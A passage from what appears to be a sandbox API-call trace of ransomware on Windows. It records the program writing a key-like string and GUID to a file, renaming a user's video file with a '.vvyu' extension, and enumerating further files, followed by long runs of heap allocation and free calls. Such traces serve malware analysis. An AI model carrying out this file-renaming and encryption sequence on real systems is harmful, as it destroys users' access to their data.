lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0203.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0203.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0203.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0203.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0203.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.646] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0203.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0203.647] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.647] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0203.647] CloseHandle (hObject=0x510) returned 1 [0203.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x2ea6a68 [0203.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.649] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\QQ8tJSc3zM363.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\qq8tjsc3zm363.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\QQ8tJSc3zM363.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\qq8tjsc3zm363.avi.vvyu")) returned 1 [0203.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.652] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0203.655] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ad7bdf0, ftCreationTime.dwHighDateTime=0x1d89f31, ftLastAccessTime.dwLowDateTime=0x3c1baa10, ftLastAccessTime.dwHighDateTime=0x1d8a429, ftLastWriteTime.dwLowDateTime=0x3c1baa10, ftLastWriteTime.dwHighDateTime=0x1d8a429, nFileSizeHigh=0x0, nFileSizeLow=0x11db4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QQ8tJSc3zM363.avi", cAlternateFileName="QQ8TJS~1.AVI")) returned 0 [0203.655] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0203.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0203.656] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0203.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c388 | out: hHeap=0x620000) returned 1 [0203.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0203.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0203.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0203.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0203.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0203.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0203.658] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0203.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0203.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0203.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.698] 